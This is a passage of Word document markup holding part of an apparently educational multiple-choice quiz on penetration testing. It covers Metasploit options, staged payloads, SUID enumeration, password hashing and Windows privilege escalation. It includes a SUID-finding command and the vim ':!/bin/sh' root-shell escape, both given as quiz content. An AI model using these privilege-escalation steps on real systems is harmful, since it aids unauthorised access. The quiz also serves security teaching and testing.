          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> RHOST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> RPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SRVHOST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is the main practical advantage of a staged payload over a stageless one?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is always undetectable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It has a smaller initial network footprint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It never needs a listener</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It works without any privileges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> find / -perm -4000 -type f 2&gt;/dev/null is used to find:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> World-writable files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hidden files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cron jobs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why is granting sudo access to vim a critical security mistake?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vim cannot be run as root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vim has a documented shell-escape (e.g. :!/bin/sh) that becomes a root shell under sudo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vim deletes files automatically</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vim requires a GUI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> What makes /etc/shadow more sensitive than /etc/passwd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/shadow lists usernames only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/shadow is world-readable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/shadow holds password hashes and is readable only by root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/passwd is encrypted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which Windows privilege-escalation technique exploits a service path containing unquoted spaces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Token impersonation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Weak registry permissions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unquoted service paths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DLL hijacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why is MD5 considered insufficient for storing passwords today?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It produces too long a hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is too slow to compute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is fast to compute, enabling very high-speed brute-force/rainbow-table attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It cannot hash passwords at all</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q9.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> What does salting primarily protect against?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Network sniffing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reuse of precomputed (rainbow table) hash lookups across many accounts</w:t>
      </w:r>
    </w:p>
